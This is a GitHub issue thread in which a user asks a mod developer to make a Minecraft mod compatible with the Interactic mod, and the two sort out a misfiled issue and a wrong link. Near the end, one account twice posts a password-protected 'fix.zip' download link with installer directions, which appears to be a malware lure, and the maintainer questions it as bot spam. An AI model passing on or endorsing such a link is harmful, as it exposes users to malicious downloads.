### ISSUE TITLE
[Compatibly Request for Doom's It's Still Explosive] Interactic

### ISSUE THREAD

**Issue by TheShadyyOneYT** [JustDoom/VillagerInABucket#3]
It currently doesn't explode with interactic item drops enabled. https://www.curseforge.com/minecraft/mc-mods/interactic

###Any chance you could add compatibility for this mod?

![2024-08-26_01 17 01](https://github.com/user-attachments/assets/4169361d-4f33-4fae-ae6f-aac1ba4fa411)
![2024-08-26_01 17 01_2](https://github.com/user-attachments/assets/f563b429-5e63-4b02-981e-02cffbf18020)
![2024-08-26_01 17 03](https://github.com/user-attachments/assets/8fc09d62-7f45-4f56-a5cc-f2cc6c3928b0)
![2024-08-26_01 17 11](https://github.com/user-attachments/assets/6f322ac7-9f94-4f63-a8f3-f5643427da00)
![2024-08-26_01 17 12](https://github.com/user-attachments/assets/fbf41b03-1dd2-4b06-8277-03d530a875f0)
![2024-08-26_01 17 14](https://github.com/user-attachments/assets/c3752837-ff57-42e4-88dc-198d0e3d0448)

**Comment by JustDoom** [comment]
This does appear to be in the wrong GitHub Repository. You want https://github.com/JustDoom/ItsStillExplosive/issues
I will look into this though as it is still my mod

**Comment by TheShadyyOneYT** [comment]
> This does appear to be in the wrong GitHub Repository. You want https://github.com/JustDoom/ItsStillExplosive/issues I will look into this though as it is still my mod

You linked the wrong one on curseforge

**Comment by JustDoom** [comment]
Ah, the one single place I put the wrong link. The links here are right. I shall fix that, thanks
![image](https://github.com/user-attachments/assets/7e894488-f0fa-43e7-9623-018ccb9a7d18)

**Comment by TheShadyyOneYT** [comment]
My apologies, I most of overlooked it. Was late at night and must of missed it

**Comment by JustDoom** [comment]
All good lol

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JustDoom** [comment]
Hello, what is this. Are you a bot?

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TheShadyyOneYT** [comment]
> Hello, what is this. Are you a bot?

 I have been seeing bots recently in GitHub repositories recently, ofd
